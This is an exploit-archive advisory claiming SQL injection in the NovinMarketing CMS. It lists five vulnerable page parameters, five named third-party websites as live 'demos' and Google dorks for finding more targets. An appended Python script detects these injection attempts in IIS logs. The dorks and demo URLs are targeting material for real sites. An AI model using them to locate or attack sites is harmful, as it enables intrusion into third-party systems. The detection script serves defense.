NovinMarketing suffers from a remote SQL injection vulnerability. Note that this finding houses site-specific data.
==================================================================================================
# [~] Exploit Title: NovinMarketing SQL Injection Bugs #
# [~] Google Dorks : " Bottom Of The Exploits " #
# [~] Date: 10/09/2012 (Mo) #
# [~] Exploit Author: Samim.s #
# [~] Version: ALL Versions #
# [~] Tested on: Se7en & BT5 #
# [~] Support WebSite : NovinMarketing.com #
==================================================================================================
# [+] SQLi Exploits : #
# http://WebSite.Com/[path]/ShowCourseAnnouncement.aspx?announceid=[SQLi] #
# http://WebSite.Com/[path]/AdsShow.aspx?adsid=[SQLi] #
# http://WebSite.Com/[path]/ProductShow.aspx?prodid=[SQLi] #
# http://WebSite.Com/[path]/ShowAnnouncement.aspx?announceid=[SQLi] #
# http://WebSite.Com/[path]/ShowNews.aspx?newsid=[SQLi] #
# ---------------------------------------------------------------------------------------------- #
# [+] Demos : #
# http://www.iedep.com/CMS_UI/ShowCourseAnnouncement.aspx?announceid=6 #
# http://peykedideno.com/FA/AdsShow.aspx?adsid=244 #
# http://www.bazarhotel.com/HotelProducts/CMS_UI/ProductShow.aspx?prodid=17 #
# http://jppars.com/CMS_UI/ShowAnnouncement.aspx?announceid=10 #
# http://www.tt-bita.com/CMS_UI/ShowNews.aspx?newsid=1026 #
# ---------------------------------------------------------------------------------------------- #
# [+] Dorks : #
# inurl:"ShowCourseAnnouncement.aspx?announceid=" #
# inurl:"AdsShow.aspx?adsid=[" #
# inurl:"ProductShow.aspx?prodid=" #
# inurl:"ShowAnnouncement.aspx?announceid=" #
# inurl:"ShowNews.aspx?newsid=" #
==================================================================================================
# [*] GreetZ To: Mr.XpR - UnknowN - Mr.EBI - SaMaN.BiLiZ & All IRaNHaCK Member + Iranian HaCkerZ #
==================================================================================================
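A defender's check for the five page/parameter pairs listed above, as an added example that is not part of the original advisory: it scans an IIS W3C log and flags requests whose id parameter is not a plain integer. The sample log is constructed, and the function names and the rule that ids are short non-negative integers (as in the demo URLs) are assumptions.

```python
import re
from urllib.parse import parse_qs

# Page -> id parameter, as listed in the advisory. IIS matches paths case-insensitively.
ID_PARAMS = {
    "showcourseannouncement.aspx": "announceid",
    "adsshow.aspx": "adsid",
    "productshow.aspx": "prodid",
    "showannouncement.aspx": "announceid",
    "shownews.aspx": "newsid",
}
PLAIN_INT = re.compile(r"[0-9]{1,10}")  # assumption: short non-negative ids

# Constructed sample of an IIS W3C log (documentation-range addresses).
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2012-10-09 10:00:01 GET /CMS_UI/ProductShow.aspx prodid=17 192.0.2.10 200
2012-10-09 10:00:05 GET /CMS_UI/showcourseannouncement.aspx announceid=6%27 198.51.100.7 500
2012-10-09 10:00:09 GET /FA/AdsShow.aspx AdsID=244x 198.51.100.7 200
2012-10-09 10:00:12 GET /CMS_UI/ShowNews.aspx newsid=1&newsid=2 198.51.100.7 200
2012-10-09 10:00:15 GET /Default.aspx id=abc 192.0.2.10 200
"""

def bad_id_values(stem, query):
    """Return the values of a listed id parameter that are not plain integers."""
    param = ID_PARAMS.get(stem.rsplit("/", 1)[-1].lower())
    if param is None or query in ("", "-"):
        return []
    decoded = parse_qs(query, keep_blank_values=True)  # percent-decodes values
    values = [v for k, vs in decoded.items() if k.lower() == param for v in vs]
    if len(values) > 1:
        return [",".join(values)]  # ASP.NET joins repeated keys with commas
    return [v for v in values if not PLAIN_INT.fullmatch(v)]

def scan_w3c_log(lines):
    """Return (client_ip, uri_stem, value) for every flagged request."""
    fields, hits = [], []
    for line in lines:
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # column order comes from the log header
        elif line.strip() and not line.startswith("#"):
            row = dict(zip(fields, line.split()))
            stem = row.get("cs-uri-stem", "")
            for value in bad_id_values(stem, row.get("cs-uri-query", "-")):
                hits.append((row.get("c-ip", "?"), stem, value))
    return hits

if __name__ == "__main__":
    print(*scan_w3c_log(SAMPLE_LOG.splitlines()), sep="\n")
```

A hit is a triage signal rather than proof of compromise; in the application itself, these parameters should be parsed as integers and bound as query parameters.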